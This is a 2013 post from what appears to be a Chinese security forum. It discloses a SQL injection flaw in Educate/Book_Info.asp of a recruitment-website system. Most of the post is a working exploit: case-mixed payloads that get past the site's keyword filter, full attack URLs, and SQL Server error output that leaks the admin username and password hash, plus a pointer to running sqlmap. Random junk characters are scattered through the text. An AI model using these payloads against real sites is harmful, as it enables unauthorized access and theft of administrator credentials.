找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2242|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
0 T, s& b. b+ ]1 V9 |7 C: k: q% L 2 t1 {3 ^! p( B( z# l
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出* V* a* ^9 z5 b, S% I& \9 _: P3 B$ d
7 h' M- l, y/ G# |
exp:如下6 W  S$ S& N  G/ R3 a* q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)& D3 I$ F5 }6 J/ ?5 l; E8 r6 \
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) m* |; j% z& ?+ G, @  e

8 |' W# Z, @1 L* qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 m7 H# n$ f* p. @# u ( f# |9 m' {; }( _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'! U% m3 A, l9 s1 @0 U- S

5 _  m6 H" [; o) s* [: W' q将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。! r$ b# d: U& D% S* ^9 v* v8 _
/ y" a8 Z& u2 J9 U# r7 V3 l1 z
/Educate/Book_Info.asp,行 8
# ^3 H9 y5 f8 R. t
  H; Z) d- e: N  Q( Phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
( k3 q: A: c. M. F4 i
. j, ^" C/ ?4 G/ ]$ tMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
  @2 G" Q" ~9 f; J) Q
! E  v9 H/ }7 s将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
/ r* D; b9 m4 a5 A9 n : A/ S+ }3 @$ ^; E) S  P
/Educate/Book_Info.asp,行 8
) p4 r. w4 [& Y! M1 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表